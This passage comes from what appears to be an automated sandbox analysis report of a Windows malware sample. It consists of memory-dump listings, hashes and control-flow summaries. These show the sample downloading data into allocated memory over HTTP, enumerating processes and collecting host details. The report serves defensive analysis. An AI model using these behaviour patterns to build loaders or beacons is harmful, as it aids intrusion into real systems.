                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snprintf$Internet$CloseHandleHttpRequeststrchr$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
                  • String ID: %s%s$*/*
                  • API String ID: 3536628738-856325523
                  • Opcode ID: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                  • Instruction ID: 50f5915c7f2e241ee0ac1eee831ab7967e328a55ddd6e4ab0271c6ae6fac4158
                  • Opcode Fuzzy Hash: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                  • Instruction Fuzzy Hash: 97718D32700FE086EB18DF61E8487AA77A1FB84B9CF484116EE5A57A9DDF39C506C740

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
                  • String ID: %s%s%s
                  • API String ID: 1671524875-1891519693
                  • Opcode ID: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                  • Instruction ID: b2fb2ad50ac61a3bd542c7160e4aaf871464551a7d18744145369df253ffca69
                  • Opcode Fuzzy Hash: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                  • Instruction Fuzzy Hash: CC414035604EE046FA0CFB62AD1976A6791BF85BDCF5C4225EE660779ACF3EC4428700

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID: malloc$ExceptionFilterSleepUnhandledmemcpystrlen
                  • String ID:
                  • API String ID: 3806033187-0
                  • Opcode ID: 1a15f57e95588fd6eb37859caae9805e746058b134bde1b939e5e1975ac52fd3
                  • Instruction ID: cd123f3a989c53f95d8397aba7ae8bbe019868c17695dbca2a3f8e564714d2d6
                  • Opcode Fuzzy Hash: 1a15f57e95588fd6eb37859caae9805e746058b134bde1b939e5e1975ac52fd3
                  • Instruction Fuzzy Hash: F6511436E19E4685EA60AF15E89127963A1BF8DBC0F5C4135D90CFB7B9DE3CE8418340

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Context$Acquire$RandomRelease
                  • String ID: ($Microsoft Base Cryptographic Provider v1.0
                  • API String ID: 685801729-4046902070
                  • Opcode ID: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                  • Instruction ID: b73b170a81a0efedc180439ce2ddd48e89c8ee95da8abe2be2f9cb4a3e930dec
                  • Opcode Fuzzy Hash: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                  • Instruction Fuzzy Hash: AD018031700F9082E718CF69EC8C359A7A2FBD8B8CF588525D65983368CF79C94AC740

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 159 265b01aca74-265b01acbd6 call 265b01b5fec call 265b01b61e8 * 3 call 265b01bb454 call 265b01bb464 * 2 call 265b01bb434 * 2 call 265b01bb454 * 2 call 265b01bf284 call 265b01bb434 * 3 call 265b01bb464 call 265b01bc230 call 265b01b34a0 call 265b01beaa8 * 2 call 265b01af3c0 202 265b01acbdd-265b01acbf2 call 265b01bb434 call 265b01af1e4 159->202 203 265b01acbd8 call 265b01bda74 159->203 209 265b01acbf4 call 265b01bda74 202->209 210 265b01acbf9-265b01acc07 call 265b01af1f8 202->210 203->202 209->210 214 265b01acc0e-265b01acc15 call 265b01af274 210->214 215 265b01acc09 call 265b01bda74 210->215 219 265b01acc17 call 265b01bda74 214->219 220 265b01acc1c-265b01acc55 call 265b01bb464 call 265b01bb434 call 265b01bf284 214->220 215->214 219->220 228 265b01acc57 call 265b01bda74 220->228 229 265b01acc5c-265b01acc90 call 265b01bb434 call 265b01beaa8 call 265b01bb434 call 265b01b5c60 220->229 228->229 239 265b01acc96-265b01acc9d 229->239 240 265b01acebb-265b01acee7 call 265b01bc218 call 265b01bf244 call 265b01bda74 229->240 241 265b01acca2-265b01acd24 call 265b01bbfc0 call 265b01bf63c call 265b01bbfc0 call 265b01bf63c * 2 call 265b01b2ee0 239->241 260 265b01acd44-265b01acd77 call 265b01aea48 call 265b01bb434 call 265b01ae9f4 241->260 261 265b01acd26-265b01acd2a 241->261 272 265b01acd9c-265b01acd9f 260->272 273 265b01acd79-265b01acd87 call 265b01bad44 260->273 262 265b01acd2e-265b01acd35 261->262 262->262 264 265b01acd37-265b01acd3a 262->264 264->260 266 265b01acd3c-265b01acd3f call 265b01b31f4 264->266 266->260 274 265b01ace26 272->274 275 265b01acda5-265b01acdc8 call 265b01b6b98 call 265b01bb434 272->275 282 265b01acd95-265b01acd98 273->282 283 265b01acd89-265b01acd93 call 265b01b8e0c 273->283 278 265b01ace2c-265b01ace38 call 265b01ae9c8 call 265b01af3c0 274->278 291 265b01acdcf-265b01acdf0 call 265b01b18c4 call 265b01b5144 call 265b01b4a04 call 265b01af3c0 275->291 292 265b01acdca 275->292 293 265b01ace3f-265b01ace5d call 265b01bbf04 278->293 294 265b01ace3a call 265b01bda74 278->294 282->272 283->272 319 265b01acdf2-265b01acdf5 call 265b01af484 291->319 320 265b01acdfa-265b01ace01 291->320 292->291 301 265b01ace5f call 265b01bda74 293->301 302 265b01ace64-265b01ace6c 293->302 294->293 301->302 302->240 305 265b01ace6e-265b01ace76 302->305 307 265b01acea4 call 265b01b211c 305->307 308 265b01ace78-265b01ace89 305->308 316 265b01acea9-265b01aceb5 307->316 312 265b01ace9c 308->312 313 265b01ace8b-265b01ace9a call 265b01af3a0 308->313 314 265b01ace9e-265b01acea0 312->314 313->314 314->307 318 265b01acea2 314->318 316->240 316->241 318->307 319->320 320->278 323 265b01ace03-265b01ace24 call 265b01ae9c8 call 265b01aea48 call 265b01aec04 320->323 323->278
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: malloc$_snprintf$_errno_time64freehtonlstrtok$AllocExitHeapLocalSleepThreadTime_callnewhrealloc
                  • String ID:
                  • API String ID: 548016584-0
                  • Opcode ID: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                  • Instruction ID: 7d05fd9a3c4479ceeb59d4e3b56407a193e28e8344ec365be5c1a4b84ae93a2d
                  • Opcode Fuzzy Hash: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                  • Instruction Fuzzy Hash: A1C16A71200FF146FA1CFB629D997AA6295BFC578CF4C4528AA26476DFDF3AC4058700

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 330 265b022098b-265b02209b1 HttpOpenRequestA 331 265b02209b2-265b02209ee 330->331 334 265b02209f4-265b02209f7 331->334 335 265b0220b91-265b0220bb2 VirtualAlloc 331->335 336 265b0220b89-265b0220b8a 334->336 337 265b02209fd 334->337 338 265b0220bb4-265b0220bd1 InternetReadFile 335->338 336->335 337->331 338->336 339 265b0220bd3-265b0220bdb 338->339 339->338 340 265b0220bdd-265b0220be7 339->340
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmp, Offset: 00000265B0220000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b0220000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocFileHttpInternetOpenReadRequestVirtual
                  • String ID: U.;
                  • API String ID: 1187293180-4213443877
                  • Opcode ID: 384db265c013720a470dfad14405f5eea7b7aafc50a111f5be8b2763f8998fcb
                  • Instruction ID: 00714b5dcb421578151980b07f23fabfcdca1cbc9504926a9608639b3f025874
                  • Opcode Fuzzy Hash: 384db265c013720a470dfad14405f5eea7b7aafc50a111f5be8b2763f8998fcb
                  • Instruction Fuzzy Hash: FB119D7034894D1BF62C859DBC9A73661CAE7D8729F24812FB50EC33DADC68CC864069

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID: Heap$AllocCreate$Thread
                  • String ID:
                  • API String ID: 393545303-0
                  • Opcode ID: 922fbbbaed78c000fb9e9957fdd4b777d08603adf046f57d23e7a85043c6e6ab
                  • Instruction ID: 68aac8d04b090a3101677ae18e1178330cd1a2ac2573c9244af62f54eefea160
                  • Opcode Fuzzy Hash: 922fbbbaed78c000fb9e9957fdd4b777d08603adf046f57d23e7a85043c6e6ab
                  • Instruction Fuzzy Hash: 6F01C412B18E8546E7188B77E94516A5792ABCEBC8F5CC134DE0EF7739ED3C91058200

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID: File$CloseCreateHandleSleepWrite
                  • String ID:
                  • API String ID: 1443029356-0
                  • Opcode ID: b522a17bd575cebcc94371981c6cfc1a90ee7fcafc91a37c2c9c97fe51e6a9e2
                  • Instruction ID: 6874f3f4318829e770349a057765b05c858cf870e5945aa9091b7e7703e73754
                  • Opcode Fuzzy Hash: b522a17bd575cebcc94371981c6cfc1a90ee7fcafc91a37c2c9c97fe51e6a9e2
                  • Instruction Fuzzy Hash: 5A11E721B28E4146F7649B16F940A35B661BB8CBA4F184335ED6EA2BE8DF3CD4458700

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmp, Offset: 00000265B0220000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b0220000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: InternetLibraryLoadOpen
                  • String ID: wini
                  • API String ID: 2559873147-1606035523
                  • Opcode ID: 5b8962ddd29d251976deea026fb88fece5b42db5fb6a2c386323d91ec97e9d21
                  • Instruction ID: d39dff5cf7045a303a26d02e43cddb4a7c6ead9b257deee56ef65651d22bb1ec
                  • Opcode Fuzzy Hash: 5b8962ddd29d251976deea026fb88fece5b42db5fb6a2c386323d91ec97e9d21
                  • Instruction Fuzzy Hash: 3A01DAB251DBD40FE31F0FB49C1A2627FA4EF03219F1A40EBD082CB0A3C812480A8662

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 363 265b01af014-265b01af04f call 265b01af118 call 265b01d2660 368 265b01af051-265b01af053 363->368 369 265b01af058-265b01af097 WSAIoctl 363->369 370 265b01af0f6-265b01af10a 368->370 371 265b01af0b4-265b01af0be 369->371 372 265b01af099-265b01af0b0 369->372 373 265b01af0c0 371->373 374 265b01af0eb-265b01af0f4 call 265b01d25e8 371->374 372->371 375 265b01af0c5-265b01af0cf 373->375 374->370 377 265b01af0d1-265b01af0d4 375->377 378 265b01af0d6-265b01af0e2 375->378 377->378 380 265b01af0e6 377->380 378->374 381 265b01af0e4 378->381 380->374 381->375
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: IoctlSocketStartupclosesocket
                  • String ID:
                  • API String ID: 365704328-0
                  • Opcode ID: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                  • Instruction ID: 6174244009bfc2ca071f45b512584e56b16670e93a2d8f5db7f6a9d6064c553a
                  • Opcode Fuzzy Hash: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                  • Instruction Fuzzy Hash: C321EA72304BE042E7248F54F94475A7795FB887ECF544629EEAD03B89CB3AC5068B00

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 382 265b0220b5e-265b0220b83 383 265b0220b85-265b0220b8e 382->383 384 265b0220b0c-265b0220b2c 382->384 385 265b0220b91-265b0220bb2 VirtualAlloc 383->385 384->382 387 265b0220bb4-265b0220bd1 InternetReadFile 385->387 389 265b0220b89-265b0220b8a 387->389 390 265b0220bd3-265b0220bdb 387->390 389->385 390->387 391 265b0220bdd-265b0220be7 390->391
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmp, Offset: 00000265B0220000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b0220000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocFileInternetReadVirtual
                  • String ID:
                  • API String ID: 3591508208-0
                  • Opcode ID: e830f2f3305a6c03536cb13fc9f87c9bb4fc1b2b0712b4c1918eebbe9fcd4fc9
                  • Instruction ID: 7fa9a22bbace680af7f584a4b47a13f6280aa3d55d7182a43663c05eb050adc6
                  • Opcode Fuzzy Hash: e830f2f3305a6c03536cb13fc9f87c9bb4fc1b2b0712b4c1918eebbe9fcd4fc9
                  • Instruction Fuzzy Hash: E3113A6130898A0BE72A95F8AC5579756E5DF4531CF28406FF44DC32C7CA19CC0BC295

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 392 7ff65b3b161a-7ff65b3b1642 393 7ff65b3b1646-7ff65b3b1663 GetMailslotInfo 392->393 394 7ff65b3b1665-7ff65b3b1671 393->394 395 7ff65b3b1697-7ff65b3b16a8 393->395 394->395 396 7ff65b3b1673-7ff65b3b1695 ReadFile 394->396 396->393
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID: FileInfoMailslotRead
                  • String ID:
                  • API String ID: 1548164602-0
                  • Opcode ID: 66d42c6e48568a3c20a91a95a7cade6158a7edf899b4214132c5ceef055053fa
                  • Instruction ID: e82da093dae011e92ff31c6083b83a64ebdf23f72d498d3db0b3faf78e2b7260
                  • Opcode Fuzzy Hash: 66d42c6e48568a3c20a91a95a7cade6158a7edf899b4214132c5ceef055053fa
                  • Instruction Fuzzy Hash: FA018273629A419AD754CB26F44056AB7B1BB88794F588135FD5EE3768DE3CC800CB00

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID: FileInfoMailslotReadSleepmalloc
                  • String ID:
                  • API String ID: 873109203-0
                  • Opcode ID: e6197d36fbd3103d4a50ca53c577c31a4c8971b37b11a622475542fefe56c484
                  • Instruction ID: 4a91d12acb251f80a022190302424dd2ab185c016dc9b95bcf862982139ee1ea
                  • Opcode Fuzzy Hash: e6197d36fbd3103d4a50ca53c577c31a4c8971b37b11a622475542fefe56c484
                  • Instruction Fuzzy Hash: BFF06222B149829AE614AF22E9015AA67A0AB49784F5C5135DF4DF7269DD3CE442C700

                  Control-flow Graph

                  APIs
                  • GetCurrentProcess.KERNEL32(?,?,-00000008,00000001,00007FF65B3B12EE,?,?,?,00007FF65B3B13E6), ref: 00007FF65B3B7E70
                  • WaitForSingleObject.KERNEL32(?,?,-00000008,00000001,00007FF65B3B12EE,?,?,?,00007FF65B3B13E6), ref: 00007FF65B3B7E7A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID: CurrentObjectProcessSingleWait
                  • String ID:
                  • API String ID: 256417062-0
                  • Opcode ID: c1dd2d7d938631d4f64d6ca566ec5bbe9b3de8b65e8f1a3089ffaa226a068756
                  • Instruction ID: 64efbf9c85d3fb95d924a84f6f39aea2968a34d655760299d9c5940d1e25bf73
                  • Opcode Fuzzy Hash: c1dd2d7d938631d4f64d6ca566ec5bbe9b3de8b65e8f1a3089ffaa226a068756
                  • Instruction Fuzzy Hash: F7D0C918E2DE5A90E9586336EC170B92651BF4C780F2C0436DD0DBB3BA9C3CF8524300

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 412 265b207936b-265b207939f 413 265b20793a5-265b20793bb 412->413 414 265b2079494-265b207949a 412->414 413->414 418 265b20793c1-265b2079409 413->418 415 265b207949c-265b20794bc VirtualAlloc 414->415 416 265b20794c0-265b20794c9 414->416 415->416 420 265b2079415-265b207941b 418->420 421 265b2079449-265b207944f 420->421 422 265b207941d-265b2079425 420->422 421->414 424 265b2079451-265b207948d 421->424 422->421 423 265b2079427-265b207942d 422->423 423->421 425 265b207942f-265b2079447 423->425 424->414 425->420
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                  • Instruction ID: a8231e14bca35286cd7d29ee7c9b86d04584844c62178651666951559be14896
                  • Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                  • Instruction Fuzzy Hash: 7E418670618B989FD784EB2CC49CB2AB7E1FBA8355F50096DF489C7264D735D881CB02
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: __doserrno_errno_invalid_parameter_noinfo
                  • String ID: U
                  • API String ID: 3902385426-4171548499
                  • Opcode ID: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                  • Instruction ID: 25c3eb6216fefede7bfa63f3a7a0d17f77c96da6fed2cbb75cd5bd53c53b4c6f
                  • Opcode Fuzzy Hash: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                  • Instruction Fuzzy Hash: BC12E832314EE18AEB388F15D84835E7BA1FB8476CF584116EA494BB9DDB3EC845CB10
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateCurrentFirstProcessProcess32SnapshotToolhelp32
                  • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                  • API String ID: 718051232-1833344708
                  • Opcode ID: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                  • Instruction ID: a744816dc3660d98bc54f59e9026db8028163c299c8b0dc9bd9d64ac944619f1
                  • Opcode Fuzzy Hash: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                  • Instruction Fuzzy Hash: B2826E31B04EF086EA6CFB269C597A912D1BFD9B8CF9C4115D90A877DDEF2AC5428700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                  • String ID: $@
                  • API String ID: 3318157856-1077428164
                  • Opcode ID: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                  • Instruction ID: 9e2b1f036e599ce1165ef3decfb21b9df83c84cbbe54375082cf6cc51497f0be
